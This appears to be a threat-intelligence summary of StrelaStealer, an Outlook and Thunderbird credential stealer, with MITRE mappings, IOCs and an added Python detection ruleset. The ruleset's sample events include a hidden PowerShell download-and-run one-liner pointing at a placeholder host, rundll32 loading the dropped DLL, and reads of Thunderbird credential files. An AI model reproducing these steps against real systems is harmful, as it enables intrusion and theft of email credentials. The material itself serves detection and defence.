StrelaStealer is an email credential stealer targeting Outlook and Thunderbird clients, delivered through an email attachment whose JavaScript payload drops a batch file that in turn fetches the final DLL payload. The campaign is active in Europe, with a focus on Germany, and the analysis covers how the malware harvests Thunderbird credential files and decrypts Outlook IMAP passwords before exfiltrating them to its C2 server. #StrelaStealer #Outlook2016 #Thunderbird #Germany #Rundll32 #CryptUnprotectData

Keypoints

  • StrelaStealer targets Outlook and Thunderbird to steal email credentials (logins.json, key4.db for Thunderbird; IMAP credentials via Outlook 2016).
  • Active campaign observed in Europe, particularly Germany; the analysis cross-references public reporting from Unit 42 and AlienVault OTX.
  • Infection chain starts with an email attachment delivering JavaScript; the JavaScript drops an obfuscated batch file to disk, and unpacking that obfuscated code exposes the stage that retrieves the final payload.
  • De-obfuscating the batch script (the analysis uses a Python script for this) reveals a one-liner that downloads the final DLL payload and executes it through rundll32.
  • The final payload is a DLL, shown in the analysis to be encrypted, and it is loaded with rundll32; that rundll32 invocation of a freshly dropped DLL is the point in the chain defenders can most readily observe.
  • Outlook 2016 stores the profile's IMAP password in the registry as a DPAPI blob tied to the user's context, so the malware, running as that same user, decrypts it with CryptUnprotectData. The analysis treats this same-user decryptability as a known security weakness.
  • IOCs include a C2 IP address (45.9.74.32), sample hash c628d2fa4bf003a6abc6f98f0368fdf4fb4ec7759505f1e133c5ee5f194e8bc4, and references to Thunderbird/Outlook credential files and registry strings.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – StrelaStealer is delivered via an email attachment containing the JavaScript payload. Quote: “StrelaStealer first delivers its payload in JavaScript via an email attachment, but we’ll skip that part for simplicity’s sake…”
  • [T1027] Obfuscated Files and Information – The batch script is obfuscated. Quote: “The batch script is obfuscated. Each variable is set to a letter in the alphabet and numbers 0–9.”
  • [T1059.001] PowerShell – The de-obfuscated batch script contains a one-liner that downloads and executes the final DLL payload. Quote: “one-liner that downloads and executes the final DLL payload.”
  • [T1218.011] Rundll32 – The final payload is loaded via Rundll32 by pointing it to the StrelaStealer DLL. Quote: “Pointing Rundll32 to StrelaStealer.”
  • [T1552.001] Credentials in Files – Thunderbird credentials are stolen from logins.json and key4.db. Quote: “it looks for files logins.json and key4.db.”
  • [T1552.002] Credentials in Registry – Outlook credentials are extracted from the Outlook 2016 profile registry key (IMAP Server/User/Password), with the password blob then decrypted via CryptUnprotectData. Quote: “the malware enumerates the key to extract the values for IMAP Server, IMAP User, and IMAP Password.”
  • [T1041] Exfiltration Over C2 Channel – Stolen credentials are sent to the C2 server. Quote: “Sending the stolen credentials to the C2 server.”
  • [T1614.001] System Location Discovery: System Language Discovery – GetKeyboardLayout is used to identify the victim's locale (Germany/Spain). Quote: “get the victim’s keyboard layout using GetKeyboardLayout. I’ve identified that this sample is targeting Germany and Spain.”

Indicators of Compromise

  • [Network] – 45.9.74.32 (C2 address) – observed in exfiltration communications to the C2 server
  • [File] – c628d2fa4bf003a6abc6f98f0368fdf4fb4ec7759505f1e133c5ee5f194e8bc4 (sample hash) – referenced in MalwareBazaar submission
  • [File] – logins.json, key4.db – Thunderbird credential files targeted by the malware
  • [Registry] – SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (under HKCU; backslashes restored from the flattened source path) – Outlook 2016 profile key holding the IMAP Server, IMAP User and IMAP Password values
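Detection logic for the chain summarized in the Keypoints and MITRE sections above, plus the network IOC, as an added example (this is not code from the original write-up): five rules run over constructed Sysmon-style events that follow the infection chain from the script host to the C2 connection. The event field names, the stage file names, the victim paths and the download URL are assumptions made for this demo; only the C2 address and the Thunderbird credential file names are taken from the page.

```python
"""Rule-based detection for the StrelaStealer delivery and theft chain.

Added example, not code from the original analysis. Field names, sample
paths, stage names and the download URL are assumptions; only the C2 IP
and the Thunderbird credential file names come from the write-up.
"""
import re
from dataclasses import dataclass

C2_IPS = {"45.9.74.32"}                          # C2 address from the IOC list
THUNDERBIRD_CRED_FILES = {"logins.json", "key4.db"}
MAIL_CLIENTS = {"thunderbird.exe", "outlook.exe"}

# Directories a phishing chain can write to without elevation (assumption).
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\(AppData|Downloads|Desktop)|ProgramData|Windows\\Temp)\\", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|BitsTransfer", re.I)


@dataclass
class Event:
    kind: str               # "process", "file" or "network"
    image: str              # image path of the acting process
    parent_image: str = ""  # process events only
    cmdline: str = ""       # process events only
    target: str = ""        # file path (file) or destination IP (network)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_script_host_spawns_shell(ev: Event):
    """JS attachment runs under wscript/cscript and hands off to the batch stage."""
    if ev.kind != "process":
        return None
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in {"wscript.exe", "cscript.exe"} and child in {"cmd.exe", "powershell.exe"}:
        return f"{parent} spawned {child}"
    return None


def rule_powershell_download_cradle(ev: Event):
    """One-liner that fetches the final DLL before handing it to rundll32."""
    if ev.kind != "process" or basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if not DOWNLOAD_CRADLE.search(ev.cmdline):
        return None
    url = re.search(r"https?://[^\s'\"]+", ev.cmdline)
    return f"download cradle -> {url.group(0) if url else '<no url>'}"


def rule_rundll32_user_writable(ev: Event):
    """T1218.011: rundll32 loading its module from a user-writable directory."""
    if ev.kind != "process" or basename(ev.image) != "rundll32.exe":
        return None
    # First argument after the rundll32 image is the module path (stops at the ',entry' part).
    m = re.match(r'\s*"?[^"\s]*rundll32(?:\.exe)?"?\s+"?([^",]+)', ev.cmdline, re.I)
    if m and USER_WRITABLE.search(m.group(1)):
        return f"rundll32 loaded {m.group(1)}"
    return None


def rule_thunderbird_cred_access(ev: Event):
    """T1552.001: a process other than the mail client reads logins.json / key4.db."""
    if ev.kind != "file" or basename(ev.target) not in THUNDERBIRD_CRED_FILES:
        return None
    if "\\thunderbird\\" in ev.target.lower() and basename(ev.image) not in MAIL_CLIENTS:
        return f"{basename(ev.image)} read {basename(ev.target)}"
    return None


def rule_known_c2(ev: Event):
    """T1041: outbound connection to the listed C2 address."""
    if ev.kind == "network" and ev.target in C2_IPS:
        return f"{basename(ev.image)} -> {ev.target}"
    return None


RULES = {
    "T1059.007 script host spawned shell": rule_script_host_spawns_shell,
    "T1059.001 PowerShell download cradle": rule_powershell_download_cradle,
    "T1218.011 rundll32 from user-writable path": rule_rundll32_user_writable,
    "T1552.001 Thunderbird credential file access": rule_thunderbird_cred_access,
    "T1041 known C2 address": rule_known_c2,
}


def detect(events):
    """Return (rule name, detail) pairs for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail:
                hits.append((name, detail))
    return hits


# Constructed sample telemetry in chain order; indexes 0, 6 and 8 are benign controls.
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\wscript.exe", r"C:\Windows\explorer.exe",
          r'wscript.exe "C:\Users\alice\Downloads\Rechnung.js"'),
    Event("process", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wscript.exe",
          r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\stage.bat"'),
    Event("process", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\cmd.exe",
          r'''powershell.exe -w hidden -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/p.dll','C:\Users\alice\AppData\Local\Temp\strela.dll')"'''),
    Event("process", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"rundll32.exe C:\Users\alice\AppData\Local\Temp\strela.dll,entry"),
    Event("file", r"C:\Windows\System32\rundll32.exe",
          target=r"C:\Users\alice\AppData\Roaming\Thunderbird\Profiles\ab12cd34.default-release\logins.json"),
    Event("file", r"C:\Windows\System32\rundll32.exe",
          target=r"C:\Users\alice\AppData\Roaming\Thunderbird\Profiles\ab12cd34.default-release\key4.db"),
    Event("file", r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe",
          target=r"C:\Users\alice\AppData\Roaming\Thunderbird\Profiles\ab12cd34.default-release\key4.db"),
    Event("network", r"C:\Windows\System32\rundll32.exe", target="45.9.74.32"),
    Event("process", r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
          r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for name, detail in detect(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

The rundll32 rule keys on the module path rather than the `rundll32.exe` image alone, which is what keeps the Control Panel launch in the last sample event quiet; the Thunderbird rule likewise stays silent when thunderbird.exe itself touches key4.db, so both are usable as alerting rules rather than just hunting queries.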

Read more: https://medium.com/@andrew.petrus/unraveling-strelastealer-5d56e150456e